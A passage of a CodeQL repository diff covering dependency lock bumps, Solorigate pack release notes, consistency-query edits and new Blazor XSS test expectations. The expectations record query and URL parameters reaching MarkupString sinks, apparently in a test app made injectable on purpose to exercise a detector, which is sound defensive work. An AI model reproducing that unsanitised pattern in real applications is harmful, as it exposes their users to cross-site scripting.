"System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.Workspaces.Common", "id": "Microsoft.CodeAnalysis.Workspaces.Common", "version": "4.12.0", "sha512": "sha512-bzZOMF3kAtQhc5kcUILy0GyhgePksk/j9DJtlvFex1UYNgXJUoEkA6IUGootH1Z6GH4Z5BuLNXiFzsz9oJwbcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "System.Composition", "System.IO.Pipelines", "System.Threading.Channels", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeCoverage", "id": "Microsoft.CodeCoverage", "version": "17.12.0", "sha512": "sha512-POBqg788rrLApvncy8rvtyJ3ynsBdU0/SGUXD+vPqyRDM/aUJbPZWx01qalGJRK1GcArSku8QDd9AVMa0TkCkA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.0", "sha512": "sha512-dY64S9XmssfAjwvuGMHleFj2cKIhIFUU2D+Kr1D1Y+92mAPN/39HQMJay2FHxSRcDEI9hATivRV/I1N7QxVJcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.3", "sha512": "sha512-0s2vnkWqUSPhhe+Llybuli0LMon5Mf7Mx9NSO9ErGFGU+dSZqwz1Ixa7mXJo2W+Y74BXYE+yfU0HIsPUMOkwZQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.12.6", "sha512": "sha512-uCT/G0W1wUteqfrriWHfLfFmArka8ISo6nUkC5gQzYZYm2PSTuqfS14DEsY0gqDuQpcLLLaYTDcEM0SA2Za5vA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.Test.Sdk", "id": "Microsoft.NET.Test.Sdk", "version": "17.12.0", "sha512": "sha512-hGf8I8+yo15etavoMd+7OXcOG6/G7HYPDEJg5aQnhMzsxaUpq+udNZzSxmEN9rGTWMZOAVFcyNXNL7YBsN6chw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": ["Microsoft.CodeCoverage"], "net47": ["Microsoft.CodeCoverage"], "net471": ["Microsoft.CodeCoverage"], "net472": ["Microsoft.CodeCoverage"], "net48": ["Microsoft.CodeCoverage"], "net5.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net6.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net7.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net8.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net9.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "7.0.4", "sha512": "sha512-mcQWjuDBh4WHGG4WcBI0k025WAdA2afMm6fs42sm1f+3gRyNQUiuMVT5gAWNUGSHmlu6qn/TCnAQpfl4Gm6cBw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, diff --git a/csharp/ql/campaigns/Solorigate/lib/CHANGELOG.md b/csharp/ql/campaigns/Solorigate/lib/CHANGELOG.md index 49b1297498cd..38009248e963 100644 --- a/csharp/ql/campaigns/Solorigate/lib/CHANGELOG.md +++ b/csharp/ql/campaigns/Solorigate/lib/CHANGELOG.md @@ -1,3 +1,7 @@ +## 1.7.37 + +No user-facing changes. + ## 1.7.36 No user-facing changes. diff --git a/csharp/ql/campaigns/Solorigate/lib/change-notes/released/1.7.37.md b/csharp/ql/campaigns/Solorigate/lib/change-notes/released/1.7.37.md new file mode 100644 index 000000000000..d451a3fb0e78 --- /dev/null +++ b/csharp/ql/campaigns/Solorigate/lib/change-notes/released/1.7.37.md @@ -0,0 +1,3 @@ +## 1.7.37 + +No user-facing changes. diff --git a/csharp/ql/campaigns/Solorigate/lib/codeql-pack.release.yml b/csharp/ql/campaigns/Solorigate/lib/codeql-pack.release.yml index 5d773ebdb702..4d975f78ff6e 100644 --- a/csharp/ql/campaigns/Solorigate/lib/codeql-pack.release.yml +++ b/csharp/ql/campaigns/Solorigate/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.7.36 +lastReleaseVersion: 1.7.37 diff --git a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml index f32462ee6824..10f9ed40e0da 100644 --- a/csharp/ql/campaigns/Solorigate/lib/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-all -version: 1.7.36 +version: 1.7.37 groups: - csharp - solorigate diff --git a/csharp/ql/campaigns/Solorigate/src/CHANGELOG.md b/csharp/ql/campaigns/Solorigate/src/CHANGELOG.md index 49b1297498cd..38009248e963 100644 --- a/csharp/ql/campaigns/Solorigate/src/CHANGELOG.md +++ b/csharp/ql/campaigns/Solorigate/src/CHANGELOG.md @@ -1,3 +1,7 @@ +## 1.7.37 + +No user-facing changes. + ## 1.7.36 No user-facing changes. diff --git a/csharp/ql/campaigns/Solorigate/src/change-notes/released/1.7.37.md b/csharp/ql/campaigns/Solorigate/src/change-notes/released/1.7.37.md new file mode 100644 index 000000000000..d451a3fb0e78 --- /dev/null +++ b/csharp/ql/campaigns/Solorigate/src/change-notes/released/1.7.37.md @@ -0,0 +1,3 @@ +## 1.7.37 + +No user-facing changes. diff --git a/csharp/ql/campaigns/Solorigate/src/codeql-pack.release.yml b/csharp/ql/campaigns/Solorigate/src/codeql-pack.release.yml index 5d773ebdb702..4d975f78ff6e 100644 --- a/csharp/ql/campaigns/Solorigate/src/codeql-pack.release.yml +++ b/csharp/ql/campaigns/Solorigate/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.7.36 +lastReleaseVersion: 1.7.37 diff --git a/csharp/ql/campaigns/Solorigate/src/qlpack.yml b/csharp/ql/campaigns/Solorigate/src/qlpack.yml index e8f5285735bd..a4148e9688b8 100644 --- a/csharp/ql/campaigns/Solorigate/src/qlpack.yml +++ b/csharp/ql/campaigns/Solorigate/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-solorigate-queries -version: 1.7.36 +version: 1.7.37 groups: - csharp - solorigate diff --git a/csharp/ql/consistency-queries/DataFlowConsistency.ql b/csharp/ql/consistency-queries/DataFlowConsistency.ql index 2f34368b669b..638bace38922 100644 --- a/csharp/ql/consistency-queries/DataFlowConsistency.ql +++ b/csharp/ql/consistency-queries/DataFlowConsistency.ql @@ -34,30 +34,18 @@ private module Input implements InputSig { n instanceof FlowSummaryNode or n.asExpr().(ObjectCreation).hasInitializer() + or + exists( + n.(PostUpdateNode).getPreUpdateNode().asExprAtNode(LocalFlow::getPostUpdateReverseStep(_)) + ) } predicate argHasPostUpdateExclude(ArgumentNode n) { n instanceof FlowSummaryNode or - not exists(LocalFlow::getAPostUpdateNodeForArg(n.getControlFlowNode())) - or n instanceof ParamsArgumentNode - } - - predicate postHasUniquePreExclude(PostUpdateNode n) { - exists(ControlFlow::Nodes::ExprNode e, ControlFlow::Nodes::ExprNode arg | - e = LocalFlow::getAPostUpdateNodeForArg(arg) and - e != arg and - n = TExprPostUpdateNode(e) - ) - } - - predicate uniquePostUpdateExclude(Node n) { - exists(ControlFlow::Nodes::ExprNode e, ControlFlow::Nodes::ExprNode arg | - e = LocalFlow::getAPostUpdateNodeForArg(arg) and - e != arg and - n.asExpr() = arg.getExpr() - ) + or + n.asExpr() = any(Expr e | not exprMayHavePostUpdateNode(e)) } predicate reverseReadExclude(Node n) { n.asExpr() = any(AwaitExpr ae).getExpr() } diff --git a/csharp/ql/consistency-queries/SsaConsistency.ql b/csharp/ql/consistency-queries/SsaConsistency.ql index 225aeb4e6de4..e9c9191b63a1 100644 --- a/csharp/ql/consistency-queries/SsaConsistency.ql +++ b/csharp/ql/consistency-queries/SsaConsistency.ql @@ -3,22 +3,6 @@ import semmle.code.csharp.dataflow.internal.SsaImpl as Impl import Impl::Consistency import Ssa -class MyRelevantDefinition extends RelevantDefinition, Ssa::Definition { - override predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) - } -} - -class MyRelevantDefinitionExt extends RelevantDefinitionExt, Impl::DefinitionExt { - override predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) - } -} - query predicate localDeclWithSsaDef(LocalVariableDeclExpr d) { // Local variables in C# must be initialized before every use, so uninitialized // local variables should not have an SSA definition, as that would imply that diff --git a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor index 39238d724298..ac3ccbe19207 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor/BlazorTest/Components/Pages/TestPage.razor @@ -81,6 +81,10 @@ +
+ +
+ @code { public class Container diff --git a/csharp/ql/integration-tests/all-platforms/blazor/XSS.expected b/csharp/ql/integration-tests/all-platforms/blazor/XSS.expected new file mode 100644 index 000000000000..795e9ad7de08 --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor/XSS.expected @@ -0,0 +1,18 @@ +#select +| BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | User-provided value | +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | User-provided value | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | User-provided value | +edges +| BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | BlazorTest/obj/Debug/net9.0/generated/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | provenance | Src:MaD:2 MaD:3 | +| BlazorTest/obj/Debug/net9.0/generated/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | provenance | Sink:MaD:1 | +models +| 1 | Sink: Microsoft.AspNetCore.Components; MarkupString; false; MarkupString; (System.String); ; Argument[0]; html-injection; manual | +| 2 | Source: Microsoft.AspNetCore.Components; SupplyParameterFromQueryAttribute; false; ; ; Attribute.Getter; ReturnValue; remote; manual | +| 3 | Summary: Microsoft.AspNetCore.Components.CompilerServices; RuntimeHelpers; false; TypeCheck; (T); ; Argument[0]; ReturnValue; value; manual | +nodes +| BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | semmle.label | access to property Value | +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | semmle.label | access to property UrlParam | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | semmle.label | access to property QueryParam | +| BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | semmle.label | access to property QueryParam : String | +| BlazorTest/obj/Debug/net9.0/generated/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | semmle.label | call to method TypeCheck : String | +subpaths diff --git a/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref new file mode 100644 index 000000000000..89b5b951bdb6 --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor/XSS.qlref @@ -0,0 +1,2 @@ +query: Security Features/CWE-079/XSS.ql +postprocess: utils/test/PrettyPrintModels.ql diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor index 39238d724298..ac3ccbe19207 100644 --- a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/BlazorTest/Components/Pages/TestPage.razor @@ -81,6 +81,10 @@ +
+ +
+ @code { public class Container diff --git a/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.expected b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.expected new file mode 100644 index 000000000000..64ab3e186a1f --- /dev/null +++ b/csharp/ql/integration-tests/all-platforms/blazor_build_mode_none/XSS.expected @@ -0,0 +1,18 @@ +#select +| BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | User-provided value | +| BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:11:48:11:55 | access to property UrlParam | User-provided value | +| BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | $@ flows to here and is written to HTML or JavaScript. | BlazorTest/Components/Pages/TestPage.razor:20:60:20:69 | access to property QueryParam | User-provided value | +edges +| BlazorTest/Components/Pages/TestPage.razor:85:23:85:32 | access to property QueryParam : String | test-db/working/razor/AC613014E59A413B9538FF8068364499/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | provenance | Src:MaD:2 MaD:3 | +| test-db/working/razor/AC613014E59A413B9538FF8068364499/Microsoft.CodeAnalysis.Razor.Compiler/Microsoft.NET.Sdk.Razor.SourceGenerators.RazorSourceGenerator/Components_Pages_TestPage_razor.g.cs:569:16:577:13 | call to method TypeCheck : String | BlazorTest/Components/MyOutput.razor:5:53:5:57 | access to property Value | provenance | Sink:MaD:1 | +models +| 1 | Sink: Microsoft.AspNetCore.Components; MarkupString; false; MarkupString; (System.String); ; Argument[0]; html-injection; manual | +| 2 | Source: 